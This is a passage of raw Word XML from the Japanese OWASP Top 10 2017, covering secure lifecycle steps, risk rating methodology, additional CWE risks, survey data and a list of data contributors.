          <w:numId w:val="1063"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">各スプリントにおいて、非機能要件に対して追加された制約を含むセキュリティストーリーを作成する。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="298"/>
    <w:bookmarkStart w:id="299" w:name="デプロイテスト及び公開"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">デプロイ、テスト及び公開</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1064"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">必要な権限を含む、アプリケーション、インタフェース、必要な全てのコンポネントのセキュアなデプロイを自動化する。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1064"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">技術的な機能とITアーキテクチャとの統合をテストし、ビジネステストを調整する。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1064"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">技術的かつビジネス的な観点から、正常系と異常系のテストケースを作成する。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1064"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">アプリケーションによる内部プロセス、保護の必要性、想定される脅威レベルに応じて、セキュリティテストを管理する。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1064"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">アプリケーションを起動し、適宜以前に使用していたアプリケーションから移行する。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1064"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">構成管理データベース（CMDB）やセキュリティアーキテクチャを含む、全ての文書を確定化する。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="299"/>
    <w:bookmarkStart w:id="300" w:name="運用及びチェンジマネジメント"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">運用及びチェンジマネジメント</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1065"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">運用には、例えばパッチ管理といったアプリケーションのセキュリティ管理に関するガイドラインを含める。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1065"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">利用者のセキュリティ意識を高め、セキュリティとユーザビリティのバランスを管理する。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1065"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">例えばアプリケーションやOS、ミドルウェア、ライブラリのバージョンアップに関する変更の計画と管理を実施する。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1065"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">変更管理データベースや運用手順書、プロジェクトに関する文書を含む全ての文書を更新する。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="300"/>
    <w:bookmarkStart w:id="301" w:name="システムの廃棄"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">システムの廃棄</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1066"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">必要なデータを全てアーカイブし、その他のデータを全て安全に消去する。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1066"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">未使用のアカウント、役割、権限の削除などを実施し、アプリケーションを安全に廃棄する。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1066"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">構成管理データベースにおいてアプリケーションのステータスを廃棄にする。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="301"/>
    <w:bookmarkEnd w:id="302"/>
    <w:bookmarkStart w:id="305" w:name="r-リスクに関する注記"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">+R リスクに関する注記</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="304" w:name="弱点として表れるリスクについて"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">弱点として表れるリスクについて</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Top 10のリスク格付手法は、</w:t>
      </w:r>
      <w:hyperlink r:id="rId65">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65">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Risk Rating Methodology</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">は脆弱性のリスクを計算するために、多数の要素を定義しています。ただし、実際のアプリケーションやAPIにおける特定の脆弱性よりも、Top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蔓延度、検出のしやすさ、悪用のしやすさ）と一つの影響要素（技術面への影響）を含めています。各要素のリスクの尺度は、各要素に特有の用語を用いて、低(1)から高(3)までの範囲です。弱点の「蔓延度」は計算する時に、必ずしも含む必要はありません。「蔓延度」データについて、いくつもの組織（25ページの謝辞参照）から統計資料の提供を受け、それらの「蔓延度」に関するデータをまとめ上げ、「蔓延度」によるTop 10の存在可能性リストを作成しました。このデータは、他の二つの発生可能性に関する要素（検出のしやすさ、悪用のしやすさ）と合わせて、各弱点の発生可能性の格付を計算しました。そしてその発生可能性の評価において、各弱点ごとに我々が推計した「技術面への影響」の平均値から、Top 10各項目のリスク順位の全体像を生成しました。（高いほど高リスク）。検出のしやすさ、悪用のしやすさ、影響は、Top 10のそれぞれのカテゴリーに関連して報告されたCVEを分析して計算しました。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">注意</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:このアプローチが「脅威エージェント」の可能性を考慮していないことに注意して下さい。また、特定のアプリケーションの技術的な詳細も考慮していません。攻撃者が特定の脆弱性を突く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ください。OWASP Top 10の目的は、特定のアプリケーションやAPIを想定したリスク分析ではありません。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">以下に、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">A6:2017-不適切なセキュリティ設定</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">を例として、我々の計算を示します。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5943600" cy="2552410"/>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3"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2552410"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="304"/>
    <w:bookmarkEnd w:id="305"/>
    <w:bookmarkStart w:id="317" w:name="rf-リスクファクターに関する詳細"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">+RF リスクファクターに関する詳細</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="307" w:name="top-10-リスクファクターのまとめ"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>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994275"/>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6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3994275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="307"/>
    <w:bookmarkStart w:id="316" w:name="その他の考慮すべきリスク"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1067"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId308">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">CWE-352: Cross-Site Request Forgery (CSRF)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1067"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId309">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">CWE-400: Uncontrolled Resource Consumption ('Resource Exhaustion', 'AppDoS')</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1067"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId310">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">CWE-434: Unrestricted Upload of File with Dangerous Type</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1067"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId311">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">CWE-451: User Interface (UI) Misrepresentation of Critical Information (Clickjacking and others)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1067"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId312">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">CWE-601: Unvalidated Forward and Redirects</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1067"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId313">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">CWE-799: Improper Control of Interaction Frequency (Anti-Automation)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1067"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId314">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">CWE-829: Inclusion of Functionality from Untrusted Control Sphere (3rd Party Content)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1067"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId315">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">CWE-918: Server-Side Request Forgery (SSRF)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="316"/>
    <w:bookmarkEnd w:id="317"/>
    <w:bookmarkStart w:id="322" w:name="dat-方法論とデータ"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">+DAT 方法論とデータ</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="318" w:name="概要"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">概要</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OWASP Project Summitにおいて、参加者とコミュニティメンバーは、データの量と調査の質の2つの観点から脆弱性の評価を実施することを決定しました。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="318"/>
    <w:bookmarkStart w:id="319" w:name="調査"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>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ランク</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">脆弱性カテゴリ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">スコア</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Exposure of Private Information ('Privacy Violation')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Cryptographic Failures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Deserialization of Untrusted Data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Authorization Bypass Through User-Controlled Key (IDOR &amp; Path Traversal)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Insufficient Logging and Monitoring [CWE-223 / CWE-778]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">440</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exposure of Private Informationは、明確に重大な脆弱性ですが、既存の</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">A3:2017-機微な情報の露出</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">に含まれています。Cryptographic Failuresは</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">A3:2017-機微な情報の露出</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">に含まれています。 Deserialization of Untrusted Dataは、</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">A8:2017-安全でないデシリアライゼーション</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">として位置付けました。4番目のUser-Controlled Keyは、</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>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Cs/>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bookmarkEnd w:id="319"/>
    <w:bookmarkStart w:id="321" w:name="データ提供依頼"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">データ提供依頼</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">収集し分析されたデータは、頻度データの線に沿います。この場合、テストしたアプリケーションで検出された脆弱性の数です。よく知られているように、ツールは脆弱性があるとすべてのインスタンスを報告するものです。他方、人は数々の例の中からひとつの結果を報告するものです。この2つの種類の報告を同じように扱って集計するのは非常に困難です。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>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20">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この度のデータ提供依頼（CFD）においては、40セット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bookmarkEnd w:id="321"/>
    <w:bookmarkEnd w:id="322"/>
    <w:bookmarkStart w:id="326" w:name="ack-謝辞"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">+ACK 謝辞</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="324" w:name="データコントリビュータへの謝辞"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">データコントリビュータへの謝辞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Top 10 2017の作成に際して、脆弱性の情報を提供してくださった以下の組織に対して感謝の意を表します。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ANCAP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Aspect Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">AsTech Consulting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Atos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Branding Brand</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bugcrowd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">BUGemot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CDAC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Checkmarx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Colegio LaSalle Monteria</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Company.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ContextIS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Contrast Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DDoS.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Derek Weeks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Easybss</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Edgescan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">EVRY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">EZI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hamed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hidden</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I4 Consulting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">iBLISS Seguran̤a &amp; Intelig̻encia</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ITsec Security Services bv</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Khallagh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Linden Lab</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">M. Limacher IT Dienstleistungen</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Micro Focus Fortify</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Minded Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">National Center for Cyber Security Technology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Network Test Labs Inc.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
